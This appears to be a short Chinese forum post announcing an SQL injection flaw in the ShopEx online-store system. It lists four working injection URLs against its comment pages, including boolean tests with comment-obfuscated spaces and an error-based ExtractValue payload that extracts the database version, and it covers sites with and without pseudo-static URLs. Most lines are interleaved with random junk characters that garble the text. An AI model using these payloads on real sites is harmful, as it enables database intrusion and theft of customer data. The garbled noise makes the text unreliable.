注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
+ d. a# d$ V# b0 p, R; s" a& v% J7 m* a+ U( r3 w- N; c
好吧,我扯远了~~
0 @/ N! R" j; s其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~! B* l8 r' B4 V
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
" t; U+ u" H! f; W) d- F8 W1 v9 ?# d; o4 x
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' c, }$ d0 q1 g7 f6 G5 P7 K7 S; k& |& l
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
" Q/ l* l% r) `5 {/ i, x8 N/ U1 U7 S' ]3 K+ D0 l
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
5 |4 B4 E0 I3 E0 _1 m0 h
n3 {* \8 A- o+ [1 Mhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 9 Z. j4 y2 y0 Z2 I9 F9 ]+ N
* m8 Z: U! k: I' i G" R1 q1 D+ v
( u9 c! l, l0 R9 A一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。/ {! s9 o% d4 b7 v' Q6 p O
如何注入就不多说了,10多年的东西了…不会也会了… 2 `& J8 j3 _5 ~# c0 W+ [, @
7 u6 d' G( R- X* M4 O/ r4 _' c
! `" c4 j2 O1 N& ], g* A: T
, s: ]8 M" Q$ M& k& V9 y
4 f+ o* }- u: o: \1 t0 S* `, J
|